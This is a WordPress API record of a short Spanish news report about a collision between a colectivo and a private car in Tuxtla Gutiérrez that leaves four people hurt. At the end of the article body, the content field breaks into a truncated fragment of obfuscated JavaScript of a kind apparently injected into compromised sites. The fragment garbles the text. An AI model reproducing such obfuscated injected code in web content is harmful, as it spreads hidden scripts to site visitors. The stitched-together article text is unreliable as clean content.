{"id":17140,"date":"2024-08-09T01:44:52","date_gmt":"2024-08-09T01:44:52","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17140"},"modified":"2024-08-09T01:44:53","modified_gmt":"2024-08-09T01:44:53","slug":"choque-entre-colectivo-y-particular-deja-4-heridos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17140","title":{"rendered":"Choque entre colectivo y particular deja 4 heridos"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"17141\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167521942-1024x576.jpg\" alt=\"\" class=\"wp-image-17141\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167521942-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167521942-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167521942-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167521942.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"17142\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167525257-1024x576.jpg\" alt=\"\" class=\"wp-image-17142\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167525257-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167525257-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167525257-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167525257.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 8 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves se registr\u00f3 un choque entre una unidad de transporte colectivo de la ruta 96 con n\u00famero econ\u00f3mico 07 y un automovil MG de color rojo cuando circulaban sobre la 15 Oriente, esquina 3a Norte del Barrio Hidalgo de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando las dos unidades circulaban de Norte a Sur, en diferentes carriles, cuando el particular intent\u00f3 pasar al otro carril e hizo corte de circulaci\u00f3n al colectivo.<\/p>\n\n\n\n<p>Por el choque, tres pasajeros resultaron heridos los cuales fueron atendidos por param\u00e9dicos de la Cruz Roja Mexicana y uno fue trasladado a un hospital particular para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Para deslindar responsabilidades, las unidades fueron llevadas a un corral\u00f3n y puestas a disposici\u00f3n del Ministerio P\u00fablico en turno.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 8 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves se registr\u00f3 un choque entre una unidad de transporte colectivo de la ruta 96 con n\u00famero econ\u00f3mico 07 y un automovil MG de color rojo cuando circulaban sobre la 15 Oriente, esquina 3a Norte del Barrio Hidalgo de Tuxtla Guti\u00e9rrez. Los &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17141,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-17140","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17140","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17140"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17140\/revisions"}],"predecessor-version":[{"id":17143,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17140\/revisions\/17143"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17141"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17140"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17140"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17140"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}